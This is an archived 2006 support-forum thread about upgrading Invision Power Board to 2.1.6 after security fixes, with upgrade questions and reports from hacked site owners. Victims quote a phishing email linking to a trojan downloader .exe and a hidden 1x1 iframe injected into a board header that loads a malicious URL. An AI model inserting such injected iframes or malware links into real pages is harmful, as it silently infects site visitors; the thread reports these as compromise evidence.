ellawella Posted May 5, 2006 Posted May 5, 2006 Everyone should upgrade to 2.1.6, yes. It fixes a few security issues, it's just too important not to. The link is in the announcement thread itself. :) Thanks Brandon, I missed it the first time. :) Can I just say these new "changed files only" packs are a really welcome addition? Makes upgrading so much easier. Thank you IPS.
BOEING777 Posted May 5, 2006 Posted May 5, 2006 Stupid newbie question, but do I just upload the new files and overwrite the existing files? And what do I do to ensure that the upgrade is done etc?
bfarber Posted May 5, 2006 Posted May 5, 2006 Upload the files overwriting the existing ones, and then visit http://yourdomain.com/forums/upgrade/ and follow the onscreen steps.Is ipb 2.0.4 board vulnerable to these exploits? There is an upgrade patch for 2.0.x in the announcements forum under the 4/25 security update topic.
BOEING777 Posted May 5, 2006 Posted May 5, 2006 Thank you :) I assume its the same procedure for Blog/Gallery too?
Michael P Posted May 5, 2006 Posted May 5, 2006 The last two emails I've got from IPS have the date inside them as 25 April. When I saw that in the security update - I thought it had been fiddled to look like the email had been sent on the same day as the updates despite it was later ;) Might want to make sure the date is changed in future emails :)
cooldude7273 Posted May 5, 2006 Posted May 5, 2006 Were there any other changes in 2.1.6 besides these security fixes?
Logan Posted May 5, 2006 Posted May 5, 2006 Yes, did you not read the announcement?Invision Power Board 2.1.6 is a maintenance release which consolidates the recent security updates and fixes two potential vulnerabilities where a moderator with topic deletion permission could force an SQL injection. [b]IPB 2.1.6 also features an improved "IPB Update Available" notification system which includes a new image when a security update is released and an interal build number to make it easier to determine which updates need to be made.[/b]
Invisionary Posted May 5, 2006 Posted May 5, 2006 Yes, did you not read the announcement? I don't see anything different. Should I? Where is this internal build info displayed? EDIT: Would it be this? v2.1.6 (ID: 21012.60504.u)
gizmo Posted May 5, 2006 Posted May 5, 2006 So my board gets Hacked: I'm the victim what about what users are saying to me? I submit ticket:I appear to be attack with some virus exploit. on one of my domains how on earth could this happen? Also I say:Also today users have been sent the below e-mail, this is not from us: ================ Sent: Friday, May 05, 2006 4:24 PM Subject: From EDITED.co.uk.Try our new service! ( EDITED Main ) > > We have made a small tool for our site, I think you will guess what to do > with it.... > http://traffweb.biz/dl/loadadv771.exe ====================== Had very little support back explaining what the tool is & what would happen if users opened it? Have had loads of abuse from site users (they don't understand Expoloits). My main concern is can anyone re-assure me as to what this tool will do if users open it? I have had one user saying they have taken all his password & causing mayhem, is this true? Also can anyone tell me what to tell users to restore some very bad damage done in th form of understanding, & re-assurance? I am well gutted.
Logan Posted May 5, 2006 Posted May 5, 2006 Kaspersky detected that file as: Trojan-Downloader.Win32.Harnig.bg Therefore when the user opens it they will be downloading something else from somewhere else that the hacker intended them to. It could be anything, a virus, a trojan, etc... so yes it is most likely bad.
gizmo Posted May 5, 2006 Posted May 5, 2006 Can someone advise on the legal side I have had so far of only 1 user saying allsorts against me and that I am to blame because he dowloaded & opened file, telling me it's doing all sorts. He's saying because e-mail came from my site. this is latest from user:AND TO TOP IT ALL NOW I CAN'T GET ONTO MY INTERNET BANKING WHICH HAS ALSO BEEN HACKED INTO. ON MY INTERNET BANKING I HAVE 3 ACCOUNTS AND A CREDIT CARD WHICH HAVE ALL MY DETAILS IN. SOMEONE IS GOING TO PAY FOR THIS AND AT THE MOMENT IT LOOKS LIKE IT WILL BE YOU AS IT CAME FROM YOUR EMAIL ADDRESS. What I don't understand is so far only one user is making such claims, above quote is just a snipit of what his assumptions are.
Spirix Posted May 5, 2006 Posted May 5, 2006 I just upgraded my forums. Everything went smooth, and quick. Thanks for IPB 2.1.6, IPS team!
gizmo Posted May 5, 2006 Posted May 5, 2006 So my board gets Hacked: I'm the victim what about what users are saying to me? I submit ticket: Also I say: Have had loads of abuse from site users (they don't understand Expoloits). I am well gutted. I noticed there is talk of what I had Here > http://forums.appletalk.com.au/index.php?showtopic=19226 How long before sites that don't upgade get this horrible thing?
Im4eversmart Posted May 6, 2006 Posted May 6, 2006 there appears to be minor blog template changes [b]skin_blog_global[/b] > [b]blog_wrapper[/b]var ipb_var_base_url = "{ipb.script_url}"; Change to var ipb_var_base_url = "{$this->ipsclass->js_base_url}"; -- skin_blog_list > bloglist_page_end <if="ipb.member['g_is_supmod'] or ipb.member['_modblog']['moderate_allow_pin']"> Change to <if="ipb.member['g_is_supmod'] or ipb.member['_blogmod']['moderate_can_pin']"> <if="ipb.member['g_is_supmod'] or ipb.member['_modblog']['moderate_allow_disable']"> Change to <if="ipb.member['g_is_supmod'] or ipb.member['_blogmod']['moderate_can_disable']"> --- So these are the only template bit changes? Nothing else for all three?
theclub Posted May 6, 2006 Posted May 6, 2006 After upgrading to 2.1.6 l now have a blank page, no error message, nothing! Every other part of the forum is accessible except the front page, click on my sig to see, then click on the main page link. Anyone have an idea? There's no point me putting a ticket in as it's the weekend, which means here in OZ we don't get seen until almost Tuesday. :(
.Nuke Posted May 6, 2006 Posted May 6, 2006 Little late here people, I already got hacked. >_< same here...
murphzlaw1 Posted May 6, 2006 Posted May 6, 2006 After upgrading to 2.1.6 l now have a blank page, no error message, nothing! Every other part of the forum is accessible except the front page, click on my sig to see, then click on the main page link. Anyone have an idea? There's no point me putting a ticket in as it's the weekend, which means here in OZ we don't get seen until almost Tuesday. :(Fatal error: Cannot instantiate non-existent class: skin_shoutbox_1 in /home/rikkcow/public_html/forums/sources/ipsclass.php on line 1362 looks like the shoutbox skin is causing your problem. but since there's an error message now, you may be working on it..:)
tonyrolm Posted May 6, 2006 Posted May 6, 2006 upload all files then go tohttp://www.yourdomain.com/forums/upgrade/ I copied the files to the upgrade folder. I ran the above http link and received the following: "Incorrect access You cannot access this file directly. If you have recently upgraded, make sure you upgraded 'admin.php'." Whats the trick? My IPB Version is still at IPB Version v2.1.5 (ID: 21011)
theclub Posted May 6, 2006 Posted May 6, 2006 Fatal error: Cannot instantiate non-existent class: skin_shoutbox_1 in /home/rikkcow/public_html/forums/sources/ipsclass.php on line 1362 looks like the shoutbox skin is causing your problem. but since there's an error message now, you may be working on it..:) Yes, l've been working with init.php turned on. cacheid_1 isn't used on my board, it's there because an upgrade didn't work properly without it. Init.php has been returned to '0' now. :(You cannot access this file directly. If you have recently upgraded, make sure you upgraded 'admin.php'." Try running ..http://www.yourdomain.com/upgrade/index.php Make sure index.php is CHMOD'd :)
Jamer Posted May 6, 2006 Posted May 6, 2006 Thanks for all 3 upgrades IPS, your hard work is really appreciated. :thumbsup:
Lee69 Posted May 6, 2006 Posted May 6, 2006 Hi, is there any chance these security fixes could have been the reason I have a random webtraffic tracker at the top of my board index? This is the code it uses:<iframe src="http://traffweb.biz/dl/adv784.php" width=1 height=1></iframe> Any ideas what it is? Upgraded to 2.1.6 though, thanks for the update. :)
ellawella Posted May 6, 2006 Posted May 6, 2006 He's saying because e-mail came from my site. this is latest from user: What I don't understand is so far only one user is making such claims, above quote is just a snipit of what his assumptions are. To the best of my knowledge he won't be able to sue because t's not your fault. [quote name='Lee
Lee69 Posted May 6, 2006 Posted May 6, 2006 Looks like you got hacked before you upgraded. Best remove that iframe code. :thumbsup: Any ideas how? What file is it in?Edit: Nm, fixed it. It was in the board header. :)
jeb1974 Posted May 6, 2006 Posted May 6, 2006 I have not seen this quesiton asked. I have a secured community site. Meaning they don't get on unless they know somebody else and they are in the membership list of clubs across the country. Very little chance a member would try to hack the site. I also don't allow people on the site unless they register and have an account and their accounts don't get approved unless we have good reason to trust them. Are people getting hacked because they have public websites? Am I in danger if I keep a trusted membership group and don't let people on that will hack the site? I'm just wondering how much of this requires to have access to the site to hack it.
Recommended Posts
Archived
This topic is now archived and is closed to further replies.